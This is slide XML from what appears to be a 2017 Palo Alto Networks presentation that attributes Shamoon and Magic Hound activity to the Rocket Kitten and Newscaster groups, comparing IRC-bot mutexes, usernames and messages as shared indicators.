        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="918188" y="1513215"/>
            <a:ext cx="4212102" cy="1941516"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2035940" y="3039747"/>
            <a:ext cx="7084182" cy="2059205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="148046" y="3102938"/>
            <a:ext cx="6588034" cy="1996014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36008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600"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="10" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="11" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="16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3200"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="14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4600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="14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40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7400"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="140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8800"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="120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SHAMOON – MAGICHOUND – the missing link</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17</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Initially, no known infection vector.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="317499" y="1763631"/>
            <a:ext cx="8108870" cy="1186267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="348760" y="1227438"/>
            <a:ext cx="8471466"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IBM wouldn’t lie, and their evidence appears IR based</a:t>
            </a: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Artifact correlation links the two.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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673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en-US" sz="7200" dirty="0"/>
              <a:t>LINKS TO OTHER THREAT ACTORS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1539414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MAGIC HOUND to ROCKET KITTEN?</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19</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="2451" t="4005" r="3727" b="2334"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="533401"/>
            <a:ext cx="6020039" cy="4627583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6296628" y="816859"/>
            <a:ext cx="2847372" cy="435075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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“…one of the C2 IPs used by an IRC bot payload from Magic Hound was found to be the same IP used to deliver a different IRC bot called MPK.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5729183" y="4178461"/>
            <a:ext cx="1296650" cy="9825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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28354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Foreword</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2</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>These slides are just like, my opinion man.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>We’ll take others’ word for it on the “Iran” side of things.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Approach is purely technical (IOC ++ malware correlation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Impossible to be completely conclusive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Lots of codewords coming up.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3132705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MAGICHOUND to NEWSCASTER</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20</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </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666479580"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="578734" y="748094"/>
          <a:ext cx="8210232" cy="3523671"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2736744">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="196519020"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2736744">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1411968174"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2736744">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="146139768"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="473517">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>LEASH (MAGICHOUND)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>PARASTOO IRC (NEWSCASTER)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1247942323"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="47351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kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>MUTEX</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRP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err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>My</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>OneCopyMutex</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800" b="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>af</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>OneCopyMutex</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="247184297"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="473517">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>USERNAME</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AS_A## : Des</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AS_A##:Des</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="254453605"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="473517">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Welcome Message</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>8</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> LED= 20160124</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Hi, my name is $USERNAME, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t> ready</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ISAC 4LED=110430</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="676246802"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="473517">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>CMD USER</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" b="1" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AF_*, AS_*</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AF_*, AS_*</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3887472994"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="370567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MAGICHOUND // SHAMOON conclusions</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21</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>  |  © 2017 Palo Alto Networks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>. Confidential and Proprietary. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474563" y="533401"/>
            <a:ext cx="8232558" cy="4807257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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SHAMOON </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> MAGICHOUND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>~= ROCKET KITTEN &amp;&amp; NEWSCASTER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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Destructive capability restricted to Saudi Arabia (for now), espionage capability is further reaching.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="551935" y="2579474"/>
            <a:ext cx="6689124" cy="715110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="474563" y="3467693"/>
            <a:ext cx="5520402" cy="849927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Multiplication Sign 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6951108" y="2546587"/>
            <a:ext cx="900000" cy="780883"/>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
        <p:nvSpPr>
          <p:cNvPr id="10" name="Multiplication Sign 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6951108" y="3553180"/>
            <a:ext cx="900000" cy="780883"/>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
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4874DBA2-0CA9-4057-9DD5-681ACD5DBA33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
